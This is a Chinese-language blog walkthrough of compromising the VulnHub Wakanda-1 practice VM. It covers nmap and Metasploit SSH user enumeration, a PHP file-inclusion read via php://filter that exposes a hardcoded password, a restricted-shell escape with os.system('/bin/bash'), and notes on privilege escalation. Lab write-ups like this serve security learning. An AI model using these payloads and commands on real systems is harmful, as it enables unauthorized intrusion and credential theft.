<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  

  
  <title>渗透靶机 | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="漏洞信息靶机信息Wakanda-1是来自VulnHub的渗透测试靶机， 下载地址为https:&#x2F;&#x2F;www.vulnhub.com&#x2F;entry&#x2F;wakanda-1,251&#x2F;#download ，下载下来的是一个OVA格式的虚拟机，可在VMware或VirtualBox中打开。虚拟机已设置DHCP，可自动获取IP。渗透目标是获取三个flag（ flag1.txt, flag2.txt, root.tx">
<meta property="og:type" content="article">
<meta property="og:title" content="渗透靶机">
<meta property="og:url" content="https://john-tlh.github.io/2020/12/10/Wakanda/">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="漏洞信息靶机信息Wakanda-1是来自VulnHub的渗透测试靶机， 下载地址为https:&#x2F;&#x2F;www.vulnhub.com&#x2F;entry&#x2F;wakanda-1,251&#x2F;#download ，下载下来的是一个OVA格式的虚拟机，可在VMware或VirtualBox中打开。虚拟机已设置DHCP，可自动获取IP。渗透目标是获取三个flag（ flag1.txt, flag2.txt, root.tx">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/John-tlh/blog/images/2020image-20201209221845804.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/John-tlh/blog/images/2020image-20201209222127372.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/John-tlh/blog/images/2020image-20201209222655279.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/John-tlh/blog/images/2020image-20201209223128496.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/John-tlh/blog/images/2020image-20201209223522783.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/John-tlh/blog/images/2020image-20201209225250169.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/John-tlh/blog/images/2020image-20201209231926724.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/John-tlh/blog/images/2020image-20201209235117323.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/John-tlh/blog/images/2020image-20201209235718639.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/John-tlh/blog/images/2020image-20201210000629155.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/John-tlh/blog/images/2020image-20201210001404186.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/John-tlh/blog/images/2020image-20201210002256911.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/John-tlh/blog/images/2020image-20201210002758275.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/John-tlh/blog/images/2020image-20201210003502059.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/John-tlh/blog/images/2020image-20201210221027013.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/John-tlh/blog/images/2020image-20201210221332471.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/John-tlh/blog/images/2020image-20201210221841566.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/John-tlh/blog/images/2020image-20201210222544487.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/John-tlh/blog/images/2020image-20201210222734588.png">
<meta property="article:published_time" content="2020-12-10T14:31:36.035Z">
<meta property="article:modified_time" content="2020-12-10T14:30:53.318Z">
<meta property="article:author" content="麦芽糖吖">
<meta property="article:tag" content="Docker">
<meta property="article:tag" content="漏洞复现">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/John-tlh/blog/images/2020image-20201209221845804.png">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 5.2.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="搜索"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="https://john-tlh.github.io"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-Wakanda" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2020/12/10/Wakanda/" class="article-date">
  <time datetime="2020-12-10T14:31:36.035Z" itemprop="datePublished">2020-12-10</time>
</a>
    
  <div class="article-category">
    <a class="article-category-link" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a>
  </div>

  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      渗透靶机
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h3 id="漏洞信息"><a href="#漏洞信息" class="headerlink" title="漏洞信息"></a>漏洞信息</h3><h3 id="靶机信息"><a href="#靶机信息" class="headerlink" title="靶机信息"></a>靶机信息</h3><p><a target="_blank" rel="noopener" href="https://www.vulnhub.com/entry/wakanda-1,251/">Wakanda-1</a>是来自<a target="_blank" rel="noopener" href="https://www.vulnhub.com/">VulnHub</a>的渗透测试靶机， 下载地址为<a target="_blank" rel="noopener" href="https://www.vulnhub.com/entry/wakanda-1,251/#download">https://www.vulnhub.com/entry/wakanda-1,251/#download</a> ，下载下来的是一个OVA格式的虚拟机，可在VMware或VirtualBox中打开。虚拟机已设置DHCP，可自动获取IP。渗透目标是获取三个flag（ flag1.txt, flag2.txt, root.txt ）。</p>
<h3 id="漏洞环境搭建"><a href="#漏洞环境搭建" class="headerlink" title="漏洞环境搭建"></a>漏洞环境搭建</h3><ul>
<li><p>下载ova镜像后载入virtualbox 打开靶机</p>
</li>
<li><p>启动kali攻击环境</p>
</li>
</ul>
<p>note:一般kali使用Vmware安装的，而下载下来的ova镜像vmware打不开。解决方案为给kali再加一块网卡设置为直连物理网络，这样kali机就可以访问到靶机了。</p>
<p>这里假设我们知道靶机所在网段为192.168.56.101</p>
<p>使用kali进行主机探测：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">fping 192.168.56.0&#x2F;24 -g &gt; 56.txt</span><br><span class="line">grep alive 56.txt</span><br></pre></td></tr></table></figure>

<p>结果如下：</p>
<p><img src="https://cdn.jsdelivr.net/gh/John-tlh/blog/images/2020image-20201209221845804.png" alt="image-20201209221845804"></p>
<p>逐一识别后，确定靶机ip为192.168.56.101</p>
<p><img src="https://cdn.jsdelivr.net/gh/John-tlh/blog/images/2020image-20201209222127372.png" alt="image-20201209222127372"></p>
<a id="more"></a>

<h3 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h3><ol>
<li>端口服务扫描</li>
<li>操作系统识别</li>
</ol>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -sV -Pn -n -O 192.168.56.101</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/John-tlh/blog/images/2020image-20201209222655279.png" alt="image-20201209222655279"></p>
<p>80端口提供web服务，操作系统大概是linux 3.2</p>
<p>没有可用cve。试着从80口下手：</p>
<h3 id="web-信息收集"><a href="#web-信息收集" class="headerlink" title="web 信息收集"></a>web 信息收集</h3><p>探测web脚本语言：</p>
<p><img src="https://cdn.jsdelivr.net/gh/John-tlh/blog/images/2020image-20201209223128496.png" alt="image-20201209223128496"></p>
<p>异常报404 正常显示。大概率是php</p>
<p>查看源码发现一个可疑超链接 版权信息：和一行注释代码：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">&lt;!-- &lt;a class=&quot;nav-link active&quot; href=&quot;?lang=fr&quot;&gt;Fr/a&gt; --&gt;</span></span><br></pre></td></tr></table></figure>

<p>试着指定参数lang=fr,get方式提交。</p>
<p>语言显示成了法语。</p>
<p><img src="https://cdn.jsdelivr.net/gh/John-tlh/blog/images/2020image-20201209223522783.png" alt="image-20201209223522783"></p>
<p>暂时记下：</p>
<ul>
<li>一个可疑版权声明的链接</li>
<li>一个lang参数</li>
</ul>
<p>使用dirbuster 进行web目录爆破：</p>
<p><img src="https://cdn.jsdelivr.net/gh/John-tlh/blog/images/2020image-20201209225250169.png" alt="image-20201209225250169"></p>
<h3 id="SSH-用户枚举"><a href="#SSH-用户枚举" class="headerlink" title="SSH 用户枚举"></a>SSH 用户枚举</h3><p>这里根据先前收集到的信息：端口为3333  有个可疑版权声明（潜在用户名）使用msf枚举ssh用户模块：</p>
<p>代码如下：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">msf-console</span><br><span class="line">use auxiliary/scanner/ssh/ssh_enumusers</span><br><span class="line"><span class="built_in">set</span> rhost 192.168.56.101</span><br><span class="line"><span class="built_in">set</span> rport 3333</span><br><span class="line"><span class="built_in">set</span> user_file ssh_us.txt</span><br><span class="line">exploit</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/John-tlh/blog/images/2020image-20201209231926724.png" alt="image-20201209231926724"></p>
<p>结果显示：成功探测到两个用户名:</p>
<ol>
<li>root</li>
<li>mamadou</li>
</ol>
<h3 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h3><p>接下来也可以使用弱密码试试连接ssh但是作用不大。饶了一圈还是回到最开始的注释代码：</p>
<p>访问/?lang=fr 返回页面正常。再访问lang.php服务端返回200.</p>
<p>分析可得此处应该存在文件包含漏洞。服务端将lang参数的值拿去拼接一个.php文件后缀。</p>
<p>下面思路来源于网上<a target="_blank" rel="noopener" href="https://blog.werner.wiki/penetrate-wakanda-1/">教程</a></p>
<p>了解上面这点，下面可以利用这个文件包含漏洞读取服务端隐私文件：思路可以说使用暴力枚举的方式尽可能多的探测到服务隐私文件。</p>
<p>思路：使用burp暴力枚举可能存在的隐私文件：</p>
<p><img src="https://cdn.jsdelivr.net/gh/John-tlh/blog/images/2020image-20201209235117323.png" alt="image-20201209235117323"></p>
<p>可以看到：当lang的值为index时，服务端返回了500。前面我们已经知道index是存在的。这里使用php的filter协议转换编码读取index.php的文件内容：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;192.168.56.101&#x2F;index.php?lang&#x3D;php:&#x2F;&#x2F;filter&#x2F;read&#x3D;convert.base64-encode&#x2F;resource&#x3D;index</span><br></pre></td></tr></table></figure>

<p>返回了index.php的源码：</p>
<p><img src="https://cdn.jsdelivr.net/gh/John-tlh/blog/images/2020image-20201209235718639.png" alt="image-20201209235718639"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">PD9waHAKJHBhc3N3b3JkID0iTmlhbWV5NEV2ZXIyMjchISEiIDsvL0kgaGF2ZSB0byByZW1lbWJlciBpdAoKaWYgKGlzc2V0KCRfR0VUWydsYW5nJ10pKQp7CmluY2x1ZGUoJF9HRVRbJ2xhbmcnXS4iLnBocCIpOwp9Cgo&#x2F;PgoKCgo8IURPQ1RZUEUgaHRtbD4KPGh0bWwgbGFuZz0iZW4iPjxoZWFkPgo8bWV0YSBodHRwLWVxdWl2PSJjb250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1VVEYtOCI+CiAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEsIHNocmluay10by1maXQ9bm8iPgogICAgPG1ldGEgbmFtZT0iZGVzY3JpcHRpb24iIGNvbnRlbnQ9IlZpYnJhbml1bSBtYXJrZXQiPgogICAgPG1ldGEgbmFtZT0iYXV0aG9yIiBjb250ZW50PSJtYW1hZG91Ij4KCiAgICA8dGl0bGU+VmlicmFuaXVtIE1hcmtldDwvdGl0bGU+CgoKICAgIDxsaW5rIGhyZWY9ImJvb3RzdHJhcC5jc3MiIHJlbD0ic3R5bGVzaGVldCI+CgogICAgCiAgICA8bGluayBocmVmPSJjb3Zlci5jc3MiIHJlbD0ic3R5bGVzaGVldCI+CiAgPC9oZWFkPgoKICA8Ym9keSBjbGFzcz0idGV4dC1jZW50ZXIiPgoKICAgIDxkaXYgY2xhc3M9ImNvdmVyLWNvbnRhaW5lciBkLWZsZXggdy0xMDAgaC0xMDAgcC0zIG14LWF1dG8gZmxleC1jb2x1bW4iPgogICAgICA8aGVhZGVyIGNsYXNzPSJtYXN0aGVhZCBtYi1hdXRvIj4KICAgICAgICA8ZGl2IGNsYXNzPSJpbm5lciI+CiAgICAgICAgICA8aDMgY2xhc3M9Im1hc3RoZWFkLWJyYW5kIj5WaWJyYW5pdW0gTWFya2V0PC9oMz4KICAgICAgICAgIDxuYXYgY2xhc3M9Im5hdiBuYXYtbWFzdGhlYWQganVzdGlmeS1jb250ZW50LWNlbnRlciI+CiAgICAgICAgICAgIDxhIGNsYXNzPSJuYXYtbGluayBhY3RpdmUiIGhyZWY9IiMiPkhvbWU8L2E+CiAgICAgICAgICAgIDwhLS0gPGEgY2xhc3M9Im5hdi1saW5rIGFjdGl2ZSIgaHJlZj0iP2xhbmc9ZnIiPkZyL2E+IC0tPgogICAgICAgICAgPC9uYXY+CiAgICAgICAgPC9kaXY+CiAgICAgIDwvaGVhZGVyPgoKICAgICAgPG1haW4gcm9sZT0ibWFpbiIgY2xhc3M9ImlubmVyIGNvdmVyIj4KICAgICAgICA8aDEgY2xhc3M9ImNvdmVyLWhlYWRpbmciPkNvbWluZyBzb29uPC9oMT4KICAgICAgICA8cCBjbGFzcz0ibGVhZCI+CiAgICAgICAgICA8P3BocAogICAgICAgICAgICBpZiAoaXNzZXQoJF9HRVRbJ2xhbmcnXSkpCiAgICAgICAgICB7CiAgICAgICAgICBlY2hvICRtZXNzYWdlOwogICAgICAgICAgfQogICAgICAgICAgZWxzZQogICAgICAgICAgewogICAgICAgICAgICA&#x2F;PgoKICAgICAgICAgICAgTmV4dCBvcGVuaW5nIG9mIHRoZSBsYXJnZXN0IHZpYnJhbml1bSBtYXJrZXQuIFRoZSBwcm9kdWN0cyBjb21lIGRpcmVjdGx5IGZyb20gdGhlIHdha2FuZGEuIHN0YXkgdHVuZWQhCiAgICAgICAgICAgIDw&#x2F;cGhwCiAgICAgICAgICB9Cj8+CiAgICAgICAgPC9wPgogICAgICAgIDxwIGNsYXNzPSJsZWFkIj4KICAgICAgICAgIDxhIGhyZWY9IiMiIGNsYXNzPSJidG4gYnRuLWxnIGJ0bi1zZWNvbmRhcnkiPkxlYXJuIG1vcmU8L2E+CiAgICAgICAgPC9wPgogICAgICA8L21haW4+CgogICAgICA8Zm9vdGVyIGNsYXNzPSJtYXN0Zm9vdCBtdC1hdXRvIj4KICAgICAgICA8ZGl2IGNsYXNzPSJpbm5lciI+CiAgICAgICAgICA8cD5NYWRlIGJ5PGEgaHJlZj0iIyI+QG1hbWFkb3U8L2E+PC9wPgogICAgICAgIDwvZGl2PgogICAgICA8L2Zvb3Rlcj4KICAgIDwvZGl2PgoKCgogIAoKPC9ib2R5PjwvaHRtbD4&#x3D;</span><br></pre></td></tr></table></figure>

<p>base64解编码后得到源码如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$password &#x3D;&quot;Niamey4Ever227!!!&quot; ;&#x2F;&#x2F;I have to remember it</span><br><span class="line"></span><br><span class="line">if (isset($_GET[&#39;lang&#39;]))</span><br><span class="line">&#123;</span><br><span class="line">include($_GET[&#39;lang&#39;].&quot;.php&quot;);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>得到一个明文密码：Niamey4Ever227!!!</p>
<p>用之前的账户进行登录：最后mamadou 用户名登录成功。</p>
<p><img src="https://cdn.jsdelivr.net/gh/John-tlh/blog/images/2020image-20201210000629155.png" alt="image-20201210000629155"></p>
<p>成功登录。但只能进入pythonshell。退出后需要重新登录。是一个低权限用户：</p>
<p>接下来首先使用pythonshell获得bashshell权限：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">import os </span><br><span class="line">os.system(<span class="string">&quot;/bin/bash&quot;</span>)</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/John-tlh/blog/images/2020image-20201210001404186.png" alt="image-20201210001404186"></p>
<ul>
<li>查看用户家目录发现falg1</li>
<li>获得内核版本。</li>
<li>但无root权限</li>
</ul>
<p>接下来就查看www下面的文件：</p>
<p><img src="https://cdn.jsdelivr.net/gh/John-tlh/blog/images/2020image-20201210002256911.png" alt="image-20201210002256911"></p>
<p>并不是我们要得。同时有提示叫我查看邮箱。看了一下好像是root用户发来的维护信息：先放着</p>
<p><img src="https://cdn.jsdelivr.net/gh/John-tlh/blog/images/2020image-20201210002758275.png" alt="image-20201210002758275"></p>
<p>接下来试着获取其它用户：</p>
<p>读取/etc/passed 文件或者直接进入home目录，发现有一个devops用户。进入后查看文件找到flag但是没有权限。</p>
<p><img src="https://cdn.jsdelivr.net/gh/John-tlh/blog/images/2020image-20201210003502059.png" alt="image-20201210003502059"></p>
<p>到这一步可以梳理下思路了：</p>
<ol>
<li>针对系统服务进行exp利用</li>
<li>可以将mamadou用户进行提权</li>
</ol>
<p>首先肯定是探测一下系统服务漏洞，根据我们掌握的信息，知道靶机有apache服务、rcpbind服务、ssh服务。另外还需要掌握靶机的操作系统（这里是linux）是哪个linux 发行版以及linux 内核版本是多少。可以通过运行以下命令：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">uname -a  ---探测系统内核</span><br><span class="line">lsb_release -a ---探测发行版本</span><br></pre></td></tr></table></figure>

<p>获得如下信息</p>
<p><img src="https://cdn.jsdelivr.net/gh/John-tlh/blog/images/2020image-20201210221027013.png" alt="image-20201210221027013"></p>
<p>接着就进入系统以及服务漏洞利用了。在进行利用前首先要找到利用点。而kali 下有非常方便的搜索功能可以帮助我们快速查找exp。比如试试这样：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">searchsploit Debian</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">searchsploit Apache</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">searchsploit Rcpbind</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">searchsploit ......</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/John-tlh/blog/images/2020image-20201210221332471.png" alt="image-20201210221332471"></p>
<p>仔细观察的话可以找到完美符合条件的exp：</p>
<ol>
<li>发行版为debian 8</li>
<li>linux内核为3.6</li>
<li>利用成功后可达到权限提升的目的</li>
</ol>
<p>这里有个限制，只能本地提权。思路是用wget 直接下载到靶机，再在靶机中运行。（关于这个有空再补）</p>
<p><strong>这里主要演示第二中方法</strong>也就是枚举用户下的可执行文件进行提权。</p>
<p>首先先把属于两个用户的所有文件进行枚举：</p>
<p><img src="https://cdn.jsdelivr.net/gh/John-tlh/blog/images/2020image-20201210221841566.png" alt="image-20201210221841566"></p>
<p>发现home没什么特别的下的文件。这里主要列出另外几个文件的详细信息：</p>
<p>mamadou用户下没什么有用的。dev目录下是字符设备。mail 下也分析不出什么。</p>
<p>进到/srv 下：发现信息</p>
<p><img src="https://cdn.jsdelivr.net/gh/John-tlh/blog/images/2020image-20201210222544487.png" alt="image-20201210222544487"></p>
<p>这里这个python文件所属用户是devops，所属组是develeper组，且当前用户对其有读写权限。因此可以从这入手，从而越权。具体看看这个文件内容是否能利用：</p>
<p><img src="https://cdn.jsdelivr.net/gh/John-tlh/blog/images/2020image-20201210222734588.png" alt="image-20201210222734588"></p>
<p>内容很简单，将test 写入/tmp目录下:查看tmp目录发现已经存在该文件：所以目前的思路就是 通过python shell实现越权。</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="https://john-tlh.github.io/2020/12/10/Wakanda/" data-id="ckixaep4l000qhkv3bjdj80wl" class="article-share-link">Share</a>
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Docker/" rel="tag">Docker</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" rel="tag">漏洞复现</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2020/12/16/%E5%A4%9A%E5%8F%B0%E7%94%B5%E8%84%91%E5%8D%8F%E4%BD%9C%EF%BC%9Ahexo+github%E5%8D%9A%E5%AE%A2/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          迁移hexo + github博客工作区
        
      </div>
    </a>
  
  
    <a href="/2020/12/09/github%E5%A4%A7%E5%AD%A6/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">why Github ?</div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">分类</h3>
    <div class="widget">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%B7%B1%E5%BA%A6%E5%AD%A6%E4%B9%A0/">深度学习</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E7%BC%96%E7%A8%8B/">编程</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E7%BC%96%E7%A8%8B%E5%BC%80%E5%8F%91/">编程开发</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E9%9A%8F%E7%AC%94/">随笔</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">标签</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/Docker/" rel="tag">Docker</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Kali/" rel="tag">Kali</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Keras/" rel="tag">Keras</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Pocsuite/" rel="tag">Pocsuite</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Pocsuite3/" rel="tag">Pocsuite3</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Python/" rel="tag">Python</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/SQL%E6%B3%A8%E5%85%A5/" rel="tag">SQL注入</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Tools/" rel="tag">Tools</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/WEB%E5%AE%89%E5%85%A8/" rel="tag">WEB安全</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/XSS/" rel="tag">XSS</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/docker/" rel="tag">docker</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/github/" rel="tag">github</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/kali/" rel="tag">kali</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/metasploit/" rel="tag">metasploit</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/pocsuite/" rel="tag">pocsuite</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/python/" rel="tag">python</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/python/" rel="tag">python'</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/web3-0/" rel="tag">web3.0</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/web%E5%AE%89%E5%85%A8/" rel="tag">web安全</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E4%B9%A0%E6%83%AF/" rel="tag">习惯</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/" rel="tag">内网渗透</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%8C%96%E7%9F%BF/" rel="tag">挖矿</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%96%B9%E6%B3%95%E4%B8%8E%E9%80%89%E6%8B%A9/" rel="tag">方法与选择</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" rel="tag">漏洞复现</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E7%BC%96%E8%BE%91%E5%99%A8/" rel="tag">编辑器</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E9%9D%B6%E5%9C%BA/" rel="tag">靶场</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E9%AB%98%E6%95%88%E5%B7%A5%E4%BD%9C/" rel="tag">高效工作</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">标签云</h3>
    <div class="widget tagcloud">
      <a href="/tags/Docker/" style="font-size: 18.33px;">Docker</a> <a href="/tags/Kali/" style="font-size: 16.67px;">Kali</a> <a href="/tags/Keras/" style="font-size: 10px;">Keras</a> <a href="/tags/Pocsuite/" style="font-size: 13.33px;">Pocsuite</a> <a href="/tags/Pocsuite3/" style="font-size: 10px;">Pocsuite3</a> <a href="/tags/Python/" style="font-size: 15px;">Python</a> <a href="/tags/SQL%E6%B3%A8%E5%85%A5/" style="font-size: 10px;">SQL注入</a> <a href="/tags/Tools/" style="font-size: 13.33px;">Tools</a> <a href="/tags/WEB%E5%AE%89%E5%85%A8/" style="font-size: 10px;">WEB安全</a> <a href="/tags/XSS/" style="font-size: 13.33px;">XSS</a> <a href="/tags/docker/" style="font-size: 10px;">docker</a> <a href="/tags/github/" style="font-size: 10px;">github</a> <a href="/tags/kali/" style="font-size: 10px;">kali</a> <a href="/tags/metasploit/" style="font-size: 11.67px;">metasploit</a> <a href="/tags/pocsuite/" style="font-size: 10px;">pocsuite</a> <a href="/tags/python/" style="font-size: 11.67px;">python</a> <a href="/tags/python/" style="font-size: 10px;">python'</a> <a href="/tags/web3-0/" style="font-size: 10px;">web3.0</a> <a href="/tags/web%E5%AE%89%E5%85%A8/" style="font-size: 11.67px;">web安全</a> <a href="/tags/%E4%B9%A0%E6%83%AF/" style="font-size: 10px;">习惯</a> <a href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/" style="font-size: 10px;">内网渗透</a> <a href="/tags/%E6%8C%96%E7%9F%BF/" style="font-size: 10px;">挖矿</a> <a href="/tags/%E6%96%B9%E6%B3%95%E4%B8%8E%E9%80%89%E6%8B%A9/" style="font-size: 10px;">方法与选择</a> <a href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" style="font-size: 20px;">漏洞复现</a> <a href="/tags/%E7%BC%96%E8%BE%91%E5%99%A8/" style="font-size: 10px;">编辑器</a> <a href="/tags/%E9%9D%B6%E5%9C%BA/" style="font-size: 10px;">靶场</a> <a href="/tags/%E9%AB%98%E6%95%88%E5%B7%A5%E4%BD%9C/" style="font-size: 10px;">高效工作</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">归档</h3>
    <div class="widget">
